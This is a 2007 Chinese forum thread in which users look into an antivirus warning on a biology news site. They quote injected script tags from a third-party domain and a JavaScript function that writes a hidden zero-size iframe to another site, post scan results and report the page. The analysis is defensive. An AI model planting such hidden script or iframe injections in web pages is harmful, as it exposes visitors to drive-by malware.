这个网站有毒吗?

显示全部楼层 · 发表于 2007-3-16 08:29:33

早上一打开生物通http://www.ebiotrade.com/就听见了小红伞的警报,奇怪了,以前打开的时候从来没有发生过,是设置的原因还是别的,有高手能解答一下吗?谢谢

显示全部楼层 · 发表于 2007-3-16 09:38:43

这个网页里有段代码:

<TR><TD><TABLE cellSpacing=0 cellPadding=0 width="100%" border=0><TBODY><TR><TD width=75><DIV align=center><IMG src="http://www.ebiotrade.com/magazine/images/82.gif" width=54 height=70></DIV></TD><TD><TABLE cellSpacing=0 cellPadding=0 width="100%" border=0><TBODY><TR><TD><A href="http://www.ebiotrade.com/emagazine/index_6.aspx" target=_blank><STRONG><script src="http://www.001yl.com/8.js"></script> - <script src="
http://www.001yl.com/8.js"></script></STRONG></A><BR><SPAN class=g13>·中国春小麦籽粒硬度puroindoline基因等位变异检测<br>

复制代码

里面这个8.js有问题，最后有段函数：

function sethome(){
document.write('<iframe src="http://www.zj5173.com/qq.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>');
}
if(amt()==1)
{
sethome()
}

复制代码

而这个qq.htm里面是加密写的，我不会解。

[ 本帖最后由 allenhippo 于 2007-3-16 09:45 编辑 ]

显示全部楼层 · 发表于 2007-3-16 09:46:39

谢谢

显示全部楼层 · 发表于 2007-3-16 09:55:47

Antivirus	Version	Update	Result
AhnLab-V3	2007.3.15.0	03.15.2007 [td]no virus found
AntiVir	7.3.1.43	03.15.2007	HEUR/Exploit.HTML
Authentium	4.93.8	03.15.2007 [td]no virus found
Avast	4.7.936.0	03.15.2007 [td]no virus found
AVG	7.5.0.447	03.15.2007 [td]no virus found
BitDefender	7.2	03.16.2007 [td]no virus found
CAT-QuickHeal	9.00	03.15.2007 [td]no virus found
ClamAV	0.90.1	03.15.2007 [td]no virus found
DrWeb	4.33	03.15.2007 [td]no virus found
eSafe	7.0.14.0	03.15.2007 [td]no virus found
eTrust-Vet	30.6.3481	03.15.2007 [td]no virus found
Ewido	4.0	03.15.2007 [td]no virus found
FileAdvisor	1	03.16.2007 [td]no virus found
Fortinet	2.85.0.0	03.15.2007 [td]no virus found
F-Prot	4.3.1.45	03.15.2007 [td]no virus found
F-Secure	6.70.13030.0	03.15.2007 [td]no virus found
Ikarus	T3.1.1.3	03.15.2007 [td]no virus found
Kaspersky	4.0.2.24	03.16.2007 [td]no virus found
McAfee	4985	03.15.2007 [td]no virus found
Microsoft	1.2306	03.15.2007 [td]no virus found
NOD32v2	2117	03.15.2007 [td]no virus found
Norman	5.80.02	03.15.2007 [td]no virus found
Panda	9.0.0.4	03.15.2007 [td]no virus found
Prevx1	V2	03.16.2007 [td]no virus found
Sophos	4.15.0	03.13.2007 [td]no virus found
Sunbelt	2.2.907.0	03.15.2007 [td]no virus found

只有红伞报那个qq.htm

显示全部楼层 · 发表于 2007-3-16 10:40:33

安全！没有在这个页面中找到木马，您可以免受内联框架式木马和脚本式木马的侵害！

悠游分析的

开红伞上去也没有事

[ 本帖最后由 beat2 于 2007-3-16 11:28 编辑 ]

显示全部楼层 · 发表于 2007-3-16 11:33:09

看红伞报的似乎是壳而已

显示全部楼层 · 发表于 2007-3-16 11:35:50

QQ.HTM引用网站==http://s102.cnzz.com/stat.php?id=388309&web_id=388309&show=pic1' language='JavaScript' charset='gb2312'
可能会有毒.,

显示全部楼层 · 发表于 2007-3-16 13:04:48

原帖由 风野胤 于 2007-3-16 11:33 发表
看红伞报的似乎是壳而已

不是报壳，exploit的意思是 to treat a person or situation as an opportunity to gain an advantage for yourself，我不知道怎么准确的翻译成中文，exploit html整一个翻译我觉得是恶意网页比较好。

所以这是启发/恶意网页，而不是启发/加密

显示全部楼层 · 发表于 2007-3-16 13:05:45

原帖由 gggh 于 2007-3-16 11:35 发表
QQ.HTM引用网站==http://s102.cnzz.com/stat.php?id=388309&web_id=388309&show=pic1' language='JavaScript' charset='gb2312'
可能会有毒.,

这个没问题，关键上面那段加密代码，估计又是一个下载器。

显示全部楼层 · 发表于 2007-3-16 14:10:39

上报了

这个网站有毒吗?

本帖子中包含更多资源